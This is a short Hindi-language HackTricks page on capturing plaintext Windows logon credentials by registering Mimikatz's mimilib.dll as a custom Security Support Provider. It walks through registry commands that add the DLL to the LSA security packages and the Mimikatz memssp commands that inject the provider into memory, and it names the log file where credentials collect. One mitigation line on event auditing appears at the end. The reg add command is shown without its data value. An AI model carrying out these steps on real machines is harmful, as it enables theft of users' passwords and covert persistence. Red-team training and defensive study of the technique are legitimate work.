Custom SSP

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें

Custom SSP

यहाँ जानें कि SSP (Security Support Provider) क्या है।
आप अपना खुद का SSP बना सकते हैं ताकि मशीन तक पहुँचने के लिए उपयोग किए गए क्रेडेंशियल्स को स्पष्ट पाठ में कैप्चर किया जा सके।

Mimilib

आप Mimikatz द्वारा प्रदान किए गए mimilib.dll बाइनरी का उपयोग कर सकते हैं। यह सभी क्रेडेंशियल्स को स्पष्ट पाठ में एक फ़ाइल के अंदर लॉग करेगा।
dll को C:\Windows\System32\ में डालें
मौजूदा LSA सुरक्षा पैकेजों की एक सूची प्राप्त करें:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll को सुरक्षा समर्थन प्रदाता सूची (सुरक्षा पैकेज) में जोड़ें:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

और एक रिबूट के बाद सभी क्रेडेंशियल्स C:\Windows\System32\kiwissp.log में स्पष्ट पाठ में पाए जा सकते हैं।

मेमोरी में

आप इसे सीधे मेमोरी में Mimikatz का उपयोग करके भी इंजेक्ट कर सकते हैं (ध्यान दें कि यह थोड़ा अस्थिर/काम नहीं कर सकता):

privilege::debug
misc::memssp

यह रिबूट को सहन नहीं करेगा।

शमन

इवेंट आईडी 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages का ऑडिट निर्माण/परिवर्तन

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें